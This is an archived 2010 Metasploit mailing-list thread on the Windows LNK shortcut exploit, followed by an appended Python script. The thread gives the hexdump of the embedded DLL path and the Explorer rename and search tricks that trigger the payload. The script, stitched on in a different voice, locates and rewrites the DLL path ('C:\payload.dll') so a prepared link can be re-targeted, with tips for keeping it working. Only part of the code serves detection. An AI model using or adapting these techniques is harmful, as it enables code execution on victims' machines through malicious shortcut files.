metasploit-framework July 2010 archive

Re: [framework] LNK Exploit Export

From: Florian Roth <Neo.X_at_nospam>
Date: Sun Jul 25 2010 - 16:39:47 GMT
To: framework <framework@spool.metasploit.com>

Hey, thanks,

I did the following but struggled because it did not work as I
expected.

I changed the contents of the LNK to the name of my DLL.

But that didn't do the trick.
I had to use the following string, with a trailing space and colon:

00000080 00 00 00 6a 00 00 00 00 00 00 20 00 3a 00 43 00 |...j...... .:.C.|
00000090 3a 00 5c 00 42 00 4e 00 57 00 45 00 6a 00 42 00 |:.\.B.N.W.E.j.B.|
000000a0 63 00 66 00 49 00 71 00 2e 00 64 00 6c 00 6c 00 |c.f.I.q...d.l.l.|
000000b0 00 00 |..|
000000b2

The tricky thing is that changing this does not seem to make it work. I
had to rename the link file to "linkfile.lnk_" on the command line and back
in EXPLORER to invoke the process defined in my DLL (calc.exe).

I suppose that the renaming causes a cache to be renewed and EXPLORER to
check the icon of the link again. Without that it won't invoke the
exploit coded in the DLL in my testing environment.

Additional information:
A second way to trigger the exploit was to use the Windows search and
search for a portion of the LNK file name. The listing of the modified
LNK file in the search results also led to execution.

Every method worked only once per session. I had to log off and login
again to make it work another time.

Hope that helps someone.
This way I am able to generate a DLL with a special payload and ship it
with my prepared LNK file.

Thanks

On Sun, 2010-07-25 at 10:30 +0200, Hendrik Baecker wrote:
>
> On 24.07.10 21:47, Florian Roth wrote:
> >
> > I noticed that every time I copied the generated DLL and LNK file to a
> > different directory, the exploit does not work anymore. So I suppose
> > that the code is bound to a fixed path where the DLL has to be located.
> >
> Don't suppose - know!
>
> hexdump -C /path/to/your.lnk ^^
>
> > I'd like to send the exploit to a friend who wants to demonstrate the
> > impact to the rest of the IT staff.
> > Is there a possibility to export the exploit or change the absolute path
> > to the DLL so he is able to put the LNK and DLL to i.e. "C:\" ??
> >
>
> I would try to hex-edit the lnk to change the voodoo you found via
> hexdump. I didn't try it myself yet; maybe some more knowledge about the LNK
> file structure / the weak M$ code is needed.
> I wouldn't say the DLL itself might be a problem - it's just a PE DLL'd
> payload.
>
> Back to your question - I'm not aware of an export function in metasploit.
>
> Cheerio!
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework

-- 
Sincerely / Saludos cordiales / Mit freundlichen Grüßen
Florian Roth
Tel: +49 06251 - 827 9402
Mobile: +49 175 - 7240 363
Fax: +49 12125 - 11699510
eMail: Florian.Roth@email.de
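The hexdump in the post shows the DLL referenced by an absolute path stored as a NUL-terminated UTF-16LE string inside the link, and Hendrik's advice is to hex-edit it. The following is an added example, not code from the original post or from Metasploit: it walks the LinkTargetIDList as laid out in MS-SHLLINK (76-byte ShellLinkHeader, uint16 IDListSize, ItemIDs each prefixed by a uint16 ItemIDSize that counts itself, 0x0000 TerminalID), locates a UTF-16LE `X:\...\name.dll` path, flags the file as carrying a DLL target, and rewrites the path while correcting ItemIDSize and IDListSize so a path of a different length leaves the ID list consistent. The sample link it builds is constructed for the demonstration only; its item data (three filler bytes, then ` :` + path) merely imitates the bytes seen in the hexdump, is an assumption rather than the real control-panel item format, and is not an exploit.

```python
"""Find, flag and re-target the DLL path inside a .lnk's LinkTargetIDList.

Added example for the thread above, not code from the original post or from
Metasploit. Layout follows MS-SHLLINK: a 76-byte ShellLinkHeader, then (when
LinkFlags bit 0, HasLinkTargetIDList, is set) IDListSize (uint16) followed by
ItemIDs (uint16 ItemIDSize counting itself, then data) and a 0x0000 TerminalID.
"""
import re
import struct

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST = 0x00000001
# UTF-16LE run of printable ASCII code units shaped like X:\...\name.dll
DLL_PATH_RE = re.compile(
    rb"[A-Za-z]\x00:\x00\\\x00(?:[\x20-\x7e]\x00)*?\.\x00[dD]\x00[lL]\x00[lL]\x00"
)


def build_sample_lnk(target_path, trailer=b""):
    """Constructed sample: a structurally valid shell link with one ItemID whose
    data is three filler bytes, then ' :' + target_path as a NUL-terminated
    UTF-16LE string, imitating the bytes in the post's hexdump. The item layout
    is an assumption, not the real control-panel item, and this is not an exploit."""
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID,
                         HAS_LINK_TARGET_ID_LIST, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    assert len(header) == HEADER_SIZE
    data = b"\x00\x00\x00" + (" :" + target_path).encode("utf-16-le") + b"\x00\x00"
    idlist = struct.pack("<H", 2 + len(data)) + data + b"\x00\x00"  # ItemID + TerminalID
    return header + struct.pack("<H", len(idlist)) + idlist + trailer


def parse_header(lnk):
    """Validate the ShellLinkHeader and return LinkFlags."""
    size, clsid, flags = struct.unpack_from("<I16sI", lnk, 0)
    if size != HEADER_SIZE or clsid != LINK_CLSID:
        raise ValueError("not a shell link")
    return flags


def iter_item_ids(lnk):
    """Yield (absolute data offset, data bytes) for each ItemID in the ID list."""
    if not parse_header(lnk) & HAS_LINK_TARGET_ID_LIST:
        return
    (idlist_size,) = struct.unpack_from("<H", lnk, HEADER_SIZE)
    pos, end = HEADER_SIZE + 2, HEADER_SIZE + 2 + idlist_size
    while pos + 2 <= end:
        (item_size,) = struct.unpack_from("<H", lnk, pos)
        if item_size == 0:  # TerminalID
            break
        if item_size < 2 or pos + item_size > end:
            raise ValueError("malformed ItemID at offset %#x" % pos)
        yield pos + 2, lnk[pos + 2:pos + item_size]
        pos += item_size


def find_dll_path(lnk):
    """Return (absolute offset, path) of the first UTF-16LE *.dll path, or None."""
    for off, data in iter_item_ids(lnk):
        m = DLL_PATH_RE.search(data)
        if m:
            return off + m.start(), m.group(0).decode("utf-16-le")
    return None


def is_suspicious(lnk):
    """A link whose target ID list names a DLL is the trait discussed in the thread."""
    return find_dll_path(lnk) is not None


def retarget(lnk, new_path):
    """Replace the DLL path and fix the enclosing ItemIDSize and IDListSize."""
    hit = find_dll_path(lnk)
    if hit is None:
        raise ValueError("no DLL path found in LinkTargetIDList")
    off, old_path = hit
    old, new = old_path.encode("utf-16-le"), new_path.encode("utf-16-le")
    delta = len(new) - len(old)
    for data_off, data in iter_item_ids(lnk):  # locate the item holding the path
        item_off = data_off - 2
        if data_off <= off < data_off + len(data):
            break
    else:
        raise AssertionError("path offset not inside any ItemID")
    out = bytearray(lnk)
    out[off:off + len(old)] = new  # bytes after the ID list (LinkInfo etc.) shift intact
    (item_size,) = struct.unpack_from("<H", out, item_off)
    struct.pack_into("<H", out, item_off, item_size + delta)
    (idlist_size,) = struct.unpack_from("<H", out, HEADER_SIZE)
    struct.pack_into("<H", out, HEADER_SIZE, idlist_size + delta)
    return bytes(out)


if __name__ == "__main__":
    sample = build_sample_lnk(r"C:\BNWEjBcfIq.dll")
    print("suspicious:", is_suspicious(sample), find_dll_path(sample))
    print("retargeted:", find_dll_path(retarget(sample, r"C:\payload.dll")))
```

The size corrections cover only the IDList container that MS-SHLLINK defines. If the item format the exploit relies on carries its own length fields inside the item data, a length change there can still break the link, so keep the replacement path the same length as the original unless those fields have been checked as well. Whether Explorer then re-reads the link (the rename and cache behaviour Florian describes) is independent of this edit.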